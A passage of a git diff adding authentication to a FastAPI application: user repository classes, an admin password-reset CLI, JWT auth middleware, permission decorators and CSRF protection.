||||
|
||||
Returns User if authentication succeeds, None otherwise.
|
||||
"""
|
||||
...
|
||||
|
||||
@abstractmethod
|
||||
async def get_user(self, user_id: str) -> "User | None":
|
||||
"""Retrieve user by ID."""
|
||||
...
|
||||
|
||||
|
||||
# Import User at runtime to avoid circular imports
|
||||
from app.gateway.auth.models import User # noqa: E402
|
||||
@@ -0,0 +1,97 @@
|
||||
"""User repository interface for abstracting database operations."""
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
|
||||
from app.gateway.auth.models import User
|
||||
|
||||
|
||||
class UserNotFoundError(LookupError):
|
||||
"""Raised when a user repository operation targets a non-existent row.
|
||||
|
||||
Subclass of :class:`LookupError` so callers that already catch
|
||||
``LookupError`` for "missing entity" can keep working unchanged,
|
||||
while specific call sites can pin to this class to distinguish
|
||||
"concurrent delete during update" from other lookups.
|
||||
"""
|
||||
|
||||
|
||||
class UserRepository(ABC):
|
||||
"""Abstract interface for user data storage.
|
||||
|
||||
Implement this interface to support different storage backends
|
||||
(SQLite)
|
||||
"""
|
||||
|
||||
@abstractmethod
|
||||
async def create_user(self, user: User) -> User:
|
||||
"""Create a new user.
|
||||
|
||||
Args:
|
||||
user: User object to create
|
||||
|
||||
Returns:
|
||||
Created User with ID assigned
|
||||
|
||||
Raises:
|
||||
ValueError: If email already exists
|
||||
"""
|
||||
...
|
||||
|
||||
@abstractmethod
|
||||
async def get_user_by_id(self, user_id: str) -> User | None:
|
||||
"""Get user by ID.
|
||||
|
||||
Args:
|
||||
user_id: User UUID as string
|
||||
|
||||
Returns:
|
||||
User if found, None otherwise
|
||||
"""
|
||||
...
|
||||
|
||||
@abstractmethod
|
||||
async def get_user_by_email(self, email: str) -> User | None:
|
||||
"""Get user by email.
|
||||
|
||||
Args:
|
||||
email: User email address
|
||||
|
||||
Returns:
|
||||
User if found, None otherwise
|
||||
"""
|
||||
...
|
||||
|
||||
@abstractmethod
|
||||
async def update_user(self, user: User) -> User:
|
||||
"""Update an existing user.
|
||||
|
||||
Args:
|
||||
user: User object with updated fields
|
||||
|
||||
Returns:
|
||||
Updated User
|
||||
|
||||
Raises:
|
||||
UserNotFoundError: If no row exists for ``user.id``. This is
|
||||
a hard failure (not a no-op) so callers cannot mistake a
|
||||
concurrent-delete race for a successful update.
|
||||
"""
|
||||
...
|
||||
|
||||
@abstractmethod
|
||||
async def count_users(self) -> int:
|
||||
"""Return total number of registered users."""
|
||||
...
|
||||
|
||||
@abstractmethod
|
||||
async def get_user_by_oauth(self, provider: str, oauth_id: str) -> User | None:
|
||||
"""Get user by OAuth provider and ID.
|
||||
|
||||
Args:
|
||||
provider: OAuth provider name (e.g. 'github', 'google')
|
||||
oauth_id: User ID from the OAuth provider
|
||||
|
||||
Returns:
|
||||
User if found, None otherwise
|
||||
"""
|
||||
...
|
||||
@@ -0,0 +1,122 @@
|
||||
"""SQLAlchemy-backed UserRepository implementation.
|
||||
|
||||
Uses the shared async session factory from
|
||||
``deerflow.persistence.engine`` — the ``users`` table lives in the
|
||||
same database as ``threads_meta``, ``runs``, ``run_events``, and
|
||||
``feedback``.
|
||||
|
||||
Constructor takes the session factory directly (same pattern as the
|
||||
other four repositories in ``deerflow.persistence.*``). Callers
|
||||
construct this after ``init_engine_from_config()`` has run.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from datetime import UTC
|
||||
from uuid import UUID
|
||||
|
||||
from sqlalchemy import func, select
|
||||
from sqlalchemy.exc import IntegrityError
|
||||
from sqlalchemy.ext.asyncio import AsyncSession, async_sessionmaker
|
||||
|
||||
from app.gateway.auth.models import User
|
||||
from app.gateway.auth.repositories.base import UserNotFoundError, UserRepository
|
||||
from deerflow.persistence.user.model import UserRow
|
||||
|
||||
|
||||
class SQLiteUserRepository(UserRepository):
|
||||
"""Async user repository backed by the shared SQLAlchemy engine."""
|
||||
|
||||
def __init__(self, session_factory: async_sessionmaker[AsyncSession]) -> None:
|
||||
self._sf = session_factory
|
||||
|
||||
# ── Converters ────────────────────────────────────────────────────
|
||||
|
||||
@staticmethod
|
||||
def _row_to_user(row: UserRow) -> User:
|
||||
return User(
|
||||
id=UUID(row.id),
|
||||
email=row.email,
|
||||
password_hash=row.password_hash,
|
||||
system_role=row.system_role, # type: ignore[arg-type]
|
||||
# SQLite loses tzinfo on read; reattach UTC so downstream
|
||||
# code can compare timestamps reliably.
|
||||
created_at=row.created_at if row.created_at.tzinfo else row.created_at.replace(tzinfo=UTC),
|
||||
oauth_provider=row.oauth_provider,
|
||||
oauth_id=row.oauth_id,
|
||||
needs_setup=row.needs_setup,
|
||||
token_version=row.token_version,
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _user_to_row(user: User) -> UserRow:
|
||||
return UserRow(
|
||||
id=str(user.id),
|
||||
email=user.email,
|
||||
password_hash=user.password_hash,
|
||||
system_role=user.system_role,
|
||||
created_at=user.created_at,
|
||||
oauth_provider=user.oauth_provider,
|
||||
oauth_id=user.oauth_id,
|
||||
needs_setup=user.needs_setup,
|
||||
token_version=user.token_version,
|
||||
)
|
||||
|
||||
# ── CRUD ──────────────────────────────────────────────────────────
|
||||
|
||||
async def create_user(self, user: User) -> User:
|
||||
"""Insert a new user. Raises ``ValueError`` on duplicate email."""
|
||||
row = self._user_to_row(user)
|
||||
async with self._sf() as session:
|
||||
session.add(row)
|
||||
try:
|
||||
await session.commit()
|
||||
except IntegrityError as exc:
|
||||
await session.rollback()
|
||||
raise ValueError(f"Email already registered: {user.email}") from exc
|
||||
return user
|
||||
|
||||
async def get_user_by_id(self, user_id: str) -> User | None:
|
||||
async with self._sf() as session:
|
||||
row = await session.get(UserRow, user_id)
|
||||
return self._row_to_user(row) if row is not None else None
|
||||
|
||||
async def get_user_by_email(self, email: str) -> User | None:
|
||||
stmt = select(UserRow).where(UserRow.email == email)
|
||||
async with self._sf() as session:
|
||||
result = await session.execute(stmt)
|
||||
row = result.scalar_one_or_none()
|
||||
return self._row_to_user(row) if row is not None else None
|
||||
|
||||
async def update_user(self, user: User) -> User:
|
||||
async with self._sf() as session:
|
||||
row = await session.get(UserRow, str(user.id))
|
||||
if row is None:
|
||||
# Hard fail on concurrent delete: callers (reset_admin,
|
||||
# password change handlers, _ensure_admin_user) all
|
||||
# fetched the user just before this call, so a missing
|
||||
# row here means the row vanished underneath us. Silent
|
||||
# success would let the caller log "password reset" for
|
||||
# a row that no longer exists.
|
||||
raise UserNotFoundError(f"User {user.id} no longer exists")
|
||||
row.email = user.email
|
||||
row.password_hash = user.password_hash
|
||||
row.system_role = user.system_role
|
||||
row.oauth_provider = user.oauth_provider
|
||||
row.oauth_id = user.oauth_id
|
||||
row.needs_setup = user.needs_setup
|
||||
row.token_version = user.token_version
|
||||
await session.commit()
|
||||
return user
|
||||
|
||||
async def count_users(self) -> int:
|
||||
stmt = select(func.count()).select_from(UserRow)
|
||||
async with self._sf() as session:
|
||||
return await session.scalar(stmt) or 0
|
||||
|
||||
async def get_user_by_oauth(self, provider: str, oauth_id: str) -> User | None:
|
||||
stmt = select(UserRow).where(UserRow.oauth_provider == provider, UserRow.oauth_id == oauth_id)
|
||||
async with self._sf() as session:
|
||||
result = await session.execute(stmt)
|
||||
row = result.scalar_one_or_none()
|
||||
return self._row_to_user(row) if row is not None else None
|
||||
@@ -0,0 +1,91 @@
|
||||
"""CLI tool to reset an admin password.
|
||||
|
||||
Usage:
|
||||
python -m app.gateway.auth.reset_admin
|
||||
python -m app.gateway.auth.reset_admin --email admin@example.com
|
||||
|
||||
Writes the new password to ``.deer-flow/admin_initial_credentials.txt``
|
||||
(mode 0600) instead of printing it, so CI / log aggregators never see
|
||||
the cleartext secret.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import asyncio
|
||||
import secrets
|
||||
import sys
|
||||
|
||||
from sqlalchemy import select
|
||||
|
||||
from app.gateway.auth.credential_file import write_initial_credentials
|
||||
from app.gateway.auth.password import hash_password
|
||||
from app.gateway.auth.repositories.sqlite import SQLiteUserRepository
|
||||
from deerflow.persistence.user.model import UserRow
|
||||
|
||||
|
||||
async def _run(email: str | None) -> int:
|
||||
from deerflow.config import get_app_config
|
||||
from deerflow.persistence.engine import (
|
||||
close_engine,
|
||||
get_session_factory,
|
||||
init_engine_from_config,
|
||||
)
|
||||
|
||||
config = get_app_config()
|
||||
await init_engine_from_config(config.database)
|
||||
try:
|
||||
sf = get_session_factory()
|
||||
if sf is None:
|
||||
print("Error: persistence engine not available (check config.database).", file=sys.stderr)
|
||||
return 1
|
||||
|
||||
repo = SQLiteUserRepository(sf)
|
||||
|
||||
if email:
|
||||
user = await repo.get_user_by_email(email)
|
||||
else:
|
||||
# Find first admin via direct SELECT — repository does not
|
||||
# expose a "first admin" helper and we do not want to add
|
||||
# one just for this CLI.
|
||||
async with sf() as session:
|
||||
stmt = select(UserRow).where(UserRow.system_role == "admin").limit(1)
|
||||
row = (await session.execute(stmt)).scalar_one_or_none()
|
||||
if row is None:
|
||||
user = None
|
||||
else:
|
||||
user = await repo.get_user_by_id(row.id)
|
||||
|
||||
if user is None:
|
||||
if email:
|
||||
print(f"Error: user '{email}' not found.", file=sys.stderr)
|
||||
else:
|
||||
print("Error: no admin user found.", file=sys.stderr)
|
||||
return 1
|
||||
|
||||
new_password = secrets.token_urlsafe(16)
|
||||
user.password_hash = hash_password(new_password)
|
||||
user.token_version += 1
|
||||
user.needs_setup = True
|
||||
await repo.update_user(user)
|
||||
|
||||
cred_path = write_initial_credentials(user.email, new_password, label="reset")
|
||||
print(f"Password reset for: {user.email}")
|
||||
print(f"Credentials written to: {cred_path} (mode 0600)")
|
||||
print("Next login will require setup (new email + password).")
|
||||
return 0
|
||||
finally:
|
||||
await close_engine()
|
||||
|
||||
|
||||
def main() -> None:
|
||||
parser = argparse.ArgumentParser(description="Reset admin password")
|
||||
parser.add_argument("--email", help="Admin email (default: first admin found)")
|
||||
args = parser.parse_args()
|
||||
|
||||
exit_code = asyncio.run(_run(args.email))
|
||||
sys.exit(exit_code)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,117 @@
|
||||
"""Global authentication middleware — fail-closed safety net.
|
||||
|
||||
Rejects unauthenticated requests to non-public paths with 401. When a
|
||||
request passes the cookie check, resolves the JWT payload to a real
|
||||
``User`` object and stamps it into both ``request.state.user`` and the
|
||||
``deerflow.runtime.user_context`` contextvar so that repository-layer
|
||||
owner filtering works automatically via the sentinel pattern.
|
||||
|
||||
Fine-grained permission checks remain in authz.py decorators.
|
||||
"""
|
||||
|
||||
from collections.abc import Callable
|
||||
|
||||
from fastapi import HTTPException, Request, Response
|
||||
from starlette.middleware.base import BaseHTTPMiddleware
|
||||
from starlette.responses import JSONResponse
|
||||
from starlette.types import ASGIApp
|
||||
|
||||
from app.gateway.auth.errors import AuthErrorCode, AuthErrorResponse
|
||||
from app.gateway.authz import _ALL_PERMISSIONS, AuthContext
|
||||
from deerflow.runtime.user_context import reset_current_user, set_current_user
|
||||
|
||||
# Paths that never require authentication.
|
||||
_PUBLIC_PATH_PREFIXES: tuple[str, ...] = (
|
||||
"/health",
|
||||
"/docs",
|
||||
"/redoc",
|
||||
"/openapi.json",
|
||||
)
|
||||
|
||||
# Exact auth paths that are public (login/register/status check).
|
||||
# /api/v1/auth/me, /api/v1/auth/change-password etc. are NOT public.
|
||||
_PUBLIC_EXACT_PATHS: frozenset[str] = frozenset(
|
||||
{
|
||||
"/api/v1/auth/login/local",
|
||||
"/api/v1/auth/register",
|
||||
"/api/v1/auth/logout",
|
||||
"/api/v1/auth/setup-status",
|
||||
}
|
||||
)
|
||||
|
||||
|
||||
def _is_public(path: str) -> bool:
|
||||
stripped = path.rstrip("/")
|
||||
if stripped in _PUBLIC_EXACT_PATHS:
|
||||
return True
|
||||
return any(path.startswith(prefix) for prefix in _PUBLIC_PATH_PREFIXES)
|
||||
|
||||
|
||||
class AuthMiddleware(BaseHTTPMiddleware):
|
||||
"""Strict auth gate: reject requests without a valid session.
|
||||
|
||||
Two-stage check for non-public paths:
|
||||
|
||||
1. Cookie presence — return 401 NOT_AUTHENTICATED if missing
|
||||
2. JWT validation via ``get_optional_user_from_request`` — return 401
|
||||
TOKEN_INVALID if the token is absent, malformed, expired, or the
|
||||
signed user does not exist / is stale
|
||||
|
||||
On success, stamps ``request.state.user`` and the
|
||||
``deerflow.runtime.user_context`` contextvar so that repository-layer
|
||||
owner filters work downstream without every route needing a
|
||||
``@require_auth`` decorator. Routes that need per-resource
|
||||
authorization (e.g. "user A cannot read user B's thread by guessing
|
||||
the URL") should additionally use ``@require_permission(...,
|
||||
owner_check=True)`` for explicit enforcement — but authentication
|
||||
itself is fully handled here.
|
||||
"""
|
||||
|
||||
def __init__(self, app: ASGIApp) -> None:
|
||||
super().__init__(app)
|
||||
|
||||
async def dispatch(self, request: Request, call_next: Callable) -> Response:
|
||||
if _is_public(request.url.path):
|
||||
return await call_next(request)
|
||||
|
||||
# Non-public path: require session cookie
|
||||
if not request.cookies.get("access_token"):
|
||||
return JSONResponse(
|
||||
status_code=401,
|
||||
content={
|
||||
"detail": AuthErrorResponse(
|
||||
code=AuthErrorCode.NOT_AUTHENTICATED,
|
||||
message="Authentication required",
|
||||
).model_dump()
|
||||
},
|
||||
)
|
||||
|
||||
# Strict JWT validation: reject junk/expired tokens with 401
|
||||
# right here instead of silently passing through. This closes
|
||||
# the "junk cookie bypass" gap (AUTH_TEST_PLAN test 7.5.8):
|
||||
# without this, non-isolation routes like /api/models would
|
||||
# accept any cookie-shaped string as authentication.
|
||||
#
|
||||
# We call the *strict* resolver so that fine-grained error
|
||||
# codes (token_expired, token_invalid, user_not_found, …)
|
||||
# propagate from AuthErrorCode, not get flattened into one
|
||||
# generic code. BaseHTTPMiddleware doesn't let HTTPException
|
||||
# bubble up, so we catch and render it as JSONResponse here.
|
||||
from app.gateway.deps import get_current_user_from_request
|
||||
|
||||
try:
|
||||
user = await get_current_user_from_request(request)
|
||||
except HTTPException as exc:
|
||||
return JSONResponse(status_code=exc.status_code, content={"detail": exc.detail})
|
||||
|
||||
# Stamp both request.state.user (for the contextvar pattern)
|
||||
# and request.state.auth (so @require_permission's "auth is
|
||||
# None" branch short-circuits instead of running the entire
|
||||
# JWT-decode + DB-lookup pipeline a second time per request).
|
||||
request.state.user = user
|
||||
request.state.auth = AuthContext(user=user, permissions=_ALL_PERMISSIONS)
|
||||
token = set_current_user(user)
|
||||
try:
|
||||
return await call_next(request)
|
||||
finally:
|
||||
reset_current_user(token)
|
||||
@@ -0,0 +1,262 @@
|
||||
"""Authorization decorators and context for DeerFlow.
|
||||
|
||||
Inspired by LangGraph Auth system: https://github.com/langchain-ai/langgraph/blob/main/libs/sdk-py/langgraph_sdk/auth/__init__.py
|
||||
|
||||
**Usage:**
|
||||
|
||||
1. Use ``@require_auth`` on routes that need authentication
|
||||
2. Use ``@require_permission("resource", "action", filter_key=...)`` for permission checks
|
||||
3. The decorator chain processes from bottom to top
|
||||
|
||||
**Example:**
|
||||
|
||||
@router.get("/{thread_id}")
|
||||
@require_auth
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def get_thread(thread_id: str, request: Request):
|
||||
# User is authenticated and has threads:read permission
|
||||
...
|
||||
|
||||
**Permission Model:**
|
||||
|
||||
- threads:read - View thread
|
||||
- threads:write - Create/update thread
|
||||
- threads:delete - Delete thread
|
||||
- runs:create - Run agent
|
||||
- runs:read - View run
|
||||
- runs:cancel - Cancel run
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import functools
|
||||
from collections.abc import Callable
|
||||
from typing import TYPE_CHECKING, Any, ParamSpec, TypeVar
|
||||
|
||||
from fastapi import HTTPException, Request
|
||||
|
||||
if TYPE_CHECKING:
|
||||
from app.gateway.auth.models import User
|
||||
|
||||
P = ParamSpec("P")
|
||||
T = TypeVar("T")
|
||||
|
||||
|
||||
# Permission constants
|
||||
class Permissions:
|
||||
"""Permission constants for resource:action format."""
|
||||
|
||||
# Threads
|
||||
THREADS_READ = "threads:read"
|
||||
THREADS_WRITE = "threads:write"
|
||||
THREADS_DELETE = "threads:delete"
|
||||
|
||||
# Runs
|
||||
RUNS_CREATE = "runs:create"
|
||||
RUNS_READ = "runs:read"
|
||||
RUNS_CANCEL = "runs:cancel"
|
||||
|
||||
|
||||
class AuthContext:
|
||||
"""Authentication context for the current request.
|
||||
|
||||
Stored in request.state.auth after require_auth decoration.
|
||||
|
||||
Attributes:
|
||||
user: The authenticated user, or None if anonymous
|
||||
permissions: List of permission strings (e.g., "threads:read")
|
||||
"""
|
||||
|
||||
__slots__ = ("user", "permissions")
|
||||
|
||||
def __init__(self, user: User | None = None, permissions: list[str] | None = None):
|
||||
self.user = user
|
||||
self.permissions = permissions or []
|
||||
|
||||
@property
|
||||
def is_authenticated(self) -> bool:
|
||||
"""Check if user is authenticated."""
|
||||
return self.user is not None
|
||||
|
||||
def has_permission(self, resource: str, action: str) -> bool:
|
||||
"""Check if context has permission for resource:action.
|
||||
|
||||
Args:
|
||||
resource: Resource name (e.g., "threads")
|
||||
action: Action name (e.g., "read")
|
||||
|
||||
Returns:
|
||||
True if user has permission
|
||||
"""
|
||||
permission = f"{resource}:{action}"
|
||||
return permission in self.permissions
|
||||
|
||||
def require_user(self) -> User:
|
||||
"""Get user or raise 401.
|
||||
|
||||
Raises:
|
||||
HTTPException 401 if not authenticated
|
||||
"""
|
||||
if not self.user:
|
||||
raise HTTPException(status_code=401, detail="Authentication required")
|
||||
return self.user
|
||||
|
||||
|
||||
def get_auth_context(request: Request) -> AuthContext | None:
|
||||
"""Get AuthContext from request state."""
|
||||
return getattr(request.state, "auth", None)
|
||||
|
||||
|
||||
_ALL_PERMISSIONS: list[str] = [
|
||||
Permissions.THREADS_READ,
|
||||
Permissions.THREADS_WRITE,
|
||||
Permissions.THREADS_DELETE,
|
||||
Permissions.RUNS_CREATE,
|
||||
Permissions.RUNS_READ,
|
||||
Permissions.RUNS_CANCEL,
|
||||
]
|
||||
|
||||
|
||||
async def _authenticate(request: Request) -> AuthContext:
|
||||
"""Authenticate request and return AuthContext.
|
||||
|
||||
Delegates to deps.get_optional_user_from_request() for the JWT→User pipeline.
|
||||
Returns AuthContext with user=None for anonymous requests.
|
||||
"""
|
||||
from app.gateway.deps import get_optional_user_from_request
|
||||
|
||||
user = await get_optional_user_from_request(request)
|
||||
if user is None:
|
||||
return AuthContext(user=None, permissions=[])
|
||||
|
||||
# In future, permissions could be stored in user record
|
||||
return AuthContext(user=user, permissions=_ALL_PERMISSIONS)
|
||||
|
||||
|
||||
def require_auth[**P, T](func: Callable[P, T]) -> Callable[P, T]:
|
||||
"""Decorator that authenticates the request and sets AuthContext.
|
||||
|
||||
Must be placed ABOVE other decorators (executes after them).
|
||||
|
||||
Usage:
|
||||
@router.get("/{thread_id}")
|
||||
@require_auth # Bottom decorator (executes first after permission check)
|
||||
@require_permission("threads", "read")
|
||||
async def get_thread(thread_id: str, request: Request):
|
||||
auth: AuthContext = request.state.auth
|
||||
...
|
||||
|
||||
Raises:
|
||||
ValueError: If 'request' parameter is missing
|
||||
"""
|
||||
|
||||
@functools.wraps(func)
|
||||
async def wrapper(*args: Any, **kwargs: Any) -> Any:
|
||||
request = kwargs.get("request")
|
||||
if request is None:
|
||||
raise ValueError("require_auth decorator requires 'request' parameter")
|
||||
|
||||
# Authenticate and set context
|
||||
auth_context = await _authenticate(request)
|
||||
request.state.auth = auth_context
|
||||
|
||||
return await func(*args, **kwargs)
|
||||
|
||||
return wrapper
|
||||
|
||||
|
||||
def require_permission(
|
||||
resource: str,
|
||||
action: str,
|
||||
owner_check: bool = False,
|
||||
require_existing: bool = False,
|
||||
) -> Callable[[Callable[P, T]], Callable[P, T]]:
|
||||
"""Decorator that checks permission for resource:action.
|
||||
|
||||
Must be used AFTER @require_auth.
|
||||
|
||||
Args:
|
||||
resource: Resource name (e.g., "threads", "runs")
|
||||
action: Action name (e.g., "read", "write", "delete")
|
||||
owner_check: If True, validates that the current user owns the resource.
|
||||
Requires 'thread_id' path parameter and performs ownership check.
|
||||
require_existing: Only meaningful with ``owner_check=True``. If True, a
|
||||
missing ``threads_meta`` row counts as a denial (404)
|
||||
instead of "untracked legacy thread, allow". Use on
|
||||
**destructive / mutating** routes (DELETE, PATCH,
|
||||
state-update) so a deleted thread can't be re-targeted
|
||||
by another user via the missing-row code path.
|
||||
|
||||
Usage:
|
||||
# Read-style: legacy untracked threads are allowed
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def get_thread(thread_id: str, request: Request):
|
||||
...
|
||||
|
||||
# Destructive: thread row MUST exist and be owned by caller
|
||||
@require_permission("threads", "delete", owner_check=True, require_existing=True)
|
||||
async def delete_thread(thread_id: str, request: Request):
|
||||
...
|
||||
|
||||
Raises:
|
||||
HTTPException 401: If authentication required but user is anonymous
|
||||
HTTPException 403: If user lacks permission
|
||||
HTTPException 404: If owner_check=True but user doesn't own the thread
|
||||
ValueError: If owner_check=True but 'thread_id' parameter is missing
|
||||
"""
|
||||
|
||||
def decorator(func: Callable[P, T]) -> Callable[P, T]:
|
||||
@functools.wraps(func)
|
||||
async def wrapper(*args: Any, **kwargs: Any) -> Any:
|
||||
request = kwargs.get("request")
|
||||
if request is None:
|
||||
raise ValueError("require_permission decorator requires 'request' parameter")
|
||||
|
||||
auth: AuthContext = getattr(request.state, "auth", None)
|
||||
if auth is None:
|
||||
auth = await _authenticate(request)
|
||||
request.state.auth = auth
|
||||
|
||||
if not auth.is_authenticated:
|
||||
raise HTTPException(status_code=401, detail="Authentication required")
|
||||
|
||||
# Check permission
|
||||
if not auth.has_permission(resource, action):
|
||||
raise HTTPException(
|
||||
status_code=403,
|
||||
detail=f"Permission denied: {resource}:{action}",
|
||||
)
|
||||
|
||||
# Owner check for thread-specific resources.
|
||||
#
|
||||
# 2.0-rc moved thread metadata into the SQL persistence layer
|
||||
# (``threads_meta`` table). We verify ownership via
|
||||
# ``ThreadMetaStore.check_access``: it returns True for
|
||||
# missing rows (untracked legacy thread) and for rows whose
|
||||
# ``owner_id`` is NULL (shared / pre-auth data), so this is
|
||||
# strict-deny rather than strict-allow — only an *existing*
|
||||
# row with a *different* owner_id triggers 404.
|
||||
if owner_check:
|
||||
thread_id = kwargs.get("thread_id")
|
||||
if thread_id is None:
|
||||
raise ValueError("require_permission with owner_check=True requires 'thread_id' parameter")
|
||||
|
||||
from app.gateway.deps import get_thread_meta_repo
|
||||
|
||||
thread_meta_repo = get_thread_meta_repo(request)
|
||||
allowed = await thread_meta_repo.check_access(
|
||||
thread_id,
|
||||
str(auth.user.id),
|
||||
require_existing=require_existing,
|
||||
)
|
||||
if not allowed:
|
||||
raise HTTPException(
|
||||
status_code=404,
|
||||
detail=f"Thread {thread_id} not found",
|
||||
)
|
||||
|
||||
return await func(*args, **kwargs)
|
||||
|
||||
return wrapper
|
||||
|
||||
return decorator
|
||||
@@ -0,0 +1,112 @@
|
||||
"""CSRF protection middleware for FastAPI.
|
||||
|
||||
Per RFC-001:
|
||||
State-changing operations require CSRF protection.
|
||||
"""
|
||||
|
||||
import secrets
|
||||
from collections.abc import Callable
|
||||
|
||||
from fastapi import Request, Response
|
||||
from starlette.middleware.base import BaseHTTPMiddleware
|
||||
from starlette.responses import JSONResponse
|
||||
from starlette.types import ASGIApp
|
||||
|
||||
CSRF_COOKIE_NAME = "csrf_token"
|
||||
CSRF_HEADER_NAME = "X-CSRF-Token"
|
||||
CSRF_TOKEN_LENGTH = 64 # bytes
|
||||
|
||||
|
||||
def is_secure_request(request: Request) -> bool:
|
||||
"""Detect whether the original client request was made over HTTPS."""
|
||||
return request.headers.get("x-forwarded-proto", request.url.scheme) == "https"
|
||||
|
||||
|
||||
def generate_csrf_token() -> str:
|
||||
"""Generate a secure random CSRF token."""
|
||||
return secrets.token_urlsafe(CSRF_TOKEN_LENGTH)
|
||||
|
||||
|
||||
def should_check_csrf(request: Request) -> bool:
|
||||
"""Determine if a request needs CSRF validation.
|
||||
|
||||
CSRF is checked for state-changing methods (POST, PUT, DELETE, PATCH).
|
||||
GET, HEAD, OPTIONS, and TRACE are exempt per RFC 7231.
|
||||
"""
|
||||
if request.method not in ("POST", "PUT", "DELETE", "PATCH"):
|
||||
return False
|
||||
|
||||
path = request.url.path.rstrip("/")
|
||||
# Exempt /api/v1/auth/me endpoint
|
||||
if path == "/api/v1/auth/me":
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
_AUTH_EXEMPT_PATHS: frozenset[str] = frozenset(
|
||||
{
|
||||
"/api/v1/auth/login/local",
|
||||
"/api/v1/auth/logout",
|
||||
"/api/v1/auth/register",
|
||||
}
|
||||
)
|
||||
|
||||
|
||||
def is_auth_endpoint(request: Request) -> bool:
|
||||
"""Check if the request is to an auth endpoint.
|
||||
|
||||
Auth endpoints don't need CSRF validation on first call (no token).
|
||||
"""
|
||||
return request.url.path.rstrip("/") in _AUTH_EXEMPT_PATHS
|
||||
|
||||
|
||||
class CSRFMiddleware(BaseHTTPMiddleware):
|
||||
"""Middleware that implements CSRF protection using Double Submit Cookie pattern."""
|
||||
|
||||
def __init__(self, app: ASGIApp) -> None:
|
||||
super().__init__(app)
|
||||
|
||||
async def dispatch(self, request: Request, call_next: Callable) -> Response:
|
||||
_is_auth = is_auth_endpoint(request)
|
||||
|
||||
if should_check_csrf(request) and not _is_auth:
|
||||
cookie_token = request.cookies.get(CSRF_COOKIE_NAME)
|
||||
header_token = request.headers.get(CSRF_HEADER_NAME)
|
||||
|
||||
if not cookie_token or not header_token:
|
||||
return JSONResponse(
|
||||
status_code=403,
|
||||
content={"detail": "CSRF token missing. Include X-CSRF-Token header."},
|
||||
)
|
||||
|
||||
if not secrets.compare_digest(cookie_token, header_token):
|
||||
return JSONResponse(
|
||||
status_code=403,
|
||||
content={"detail": "CSRF token mismatch."},
|
||||
)
|
||||
|
||||
response = await call_next(request)
|
||||
|
||||
# For auth endpoints that set up session, also set CSRF cookie
|
||||
if _is_auth and request.method == "POST":
|
||||
# Generate a new CSRF token for the session
|
||||
csrf_token = generate_csrf_token()
|
||||
is_https = is_secure_request(request)
|
||||
response.set_cookie(
|
||||
key=CSRF_COOKIE_NAME,
|
||||
value=csrf_token,
|
||||
httponly=False, # Must be JS-readable for Double Submit Cookie pattern
|
||||
secure=is_https,
|
||||
samesite="strict",
|
||||
)
|
||||
|
||||
return response
|
||||
|
||||
|
||||
def get_csrf_token(request: Request) -> str | None:
|
||||
"""Get the CSRF token from the current request's cookies.
|
||||
|
||||
This is useful for server-side rendering where you need to embed
|
||||
token in forms or headers.
|
||||
"""
|
||||
return request.cookies.get(CSRF_COOKIE_NAME)
|
||||
+180
-25
@@ -1,7 +1,8 @@
|
||||
"""Centralized accessors for singleton objects stored on ``app.state``.
|
||||
|
||||
**Getters** (used by routers): raise 503 when a required dependency is
|
||||
missing, except ``get_store`` which returns ``None``.
|
||||
missing, except ``get_store`` and ``get_thread_meta_repo`` which return
|
||||
``None``.
|
||||
|
||||
Initialization is handled directly in ``app.py`` via :class:`AsyncExitStack`.
|
||||
"""
|
||||
@@ -10,10 +11,15 @@ from __future__ import annotations
|
||||
|
||||
from collections.abc import AsyncGenerator
|
||||
from contextlib import AsyncExitStack, asynccontextmanager
|
||||
from typing import TYPE_CHECKING
|
||||
|
||||
from fastapi import FastAPI, HTTPException, Request
|
||||
|
||||
from deerflow.runtime import RunManager, StreamBridge
|
||||
from deerflow.runtime import RunContext, RunManager
|
||||
|
||||
if TYPE_CHECKING:
|
||||
from app.gateway.auth.local_provider import LocalAuthProvider
|
||||
from app.gateway.auth.repositories.sqlite import SQLiteUserRepository
|
||||
|
||||
|
||||
@asynccontextmanager
|
||||
@@ -26,45 +32,194 @@ async def langgraph_runtime(app: FastAPI) -> AsyncGenerator[None, None]:
|
||||
yield
|
||||
"""
|
||||
from deerflow.agents.checkpointer.async_provider import make_checkpointer
|
||||
from deerflow.config import get_app_config
|
||||
from deerflow.persistence.engine import close_engine, get_session_factory, init_engine_from_config
|
||||
from deerflow.runtime import make_store, make_stream_bridge
|
||||
from deerflow.runtime.events.store import make_run_event_store
|
||||
|
||||
async with AsyncExitStack() as stack:
|
||||
app.state.stream_bridge = await stack.enter_async_context(make_stream_bridge())
|
||||
|
||||
# Initialize persistence engine BEFORE checkpointer so that
|
||||
# auto-create-database logic runs first (postgres backend).
|
||||
config = get_app_config()
|
||||
await init_engine_from_config(config.database)
|
||||
|
||||
app.state.checkpointer = await stack.enter_async_context(make_checkpointer())
|
||||
app.state.store = await stack.enter_async_context(make_store())
|
||||
app.state.run_manager = RunManager()
|
||||
yield
|
||||
|
||||
# Initialize repositories — one get_session_factory() call for all.
|
||||
sf = get_session_factory()
|
||||
if sf is not None:
|
||||
from deerflow.persistence.feedback import FeedbackRepository
|
||||
from deerflow.persistence.run import RunRepository
|
||||
from deerflow.persistence.thread_meta import ThreadMetaRepository
|
||||
|
||||
app.state.run_store = RunRepository(sf)
|
||||
app.state.feedback_repo = FeedbackRepository(sf)
|
||||
app.state.thread_meta_repo = ThreadMetaRepository(sf)
|
||||
else:
|
||||
from deerflow.persistence.thread_meta import MemoryThreadMetaStore
|
||||
from deerflow.runtime.runs.store.memory import MemoryRunStore
|
||||
|
||||
app.state.run_store = MemoryRunStore()
|
||||
app.state.feedback_repo = None
|
||||
app.state.thread_meta_repo = MemoryThreadMetaStore(app.state.store)
|
||||
|
||||
# Run event store (has its own factory with config-driven backend selection)
|
||||
run_events_config = getattr(config, "run_events", None)
|
||||
app.state.run_event_store = make_run_event_store(run_events_config)
|
||||
|
||||
# RunManager with store backing for persistence
|
||||
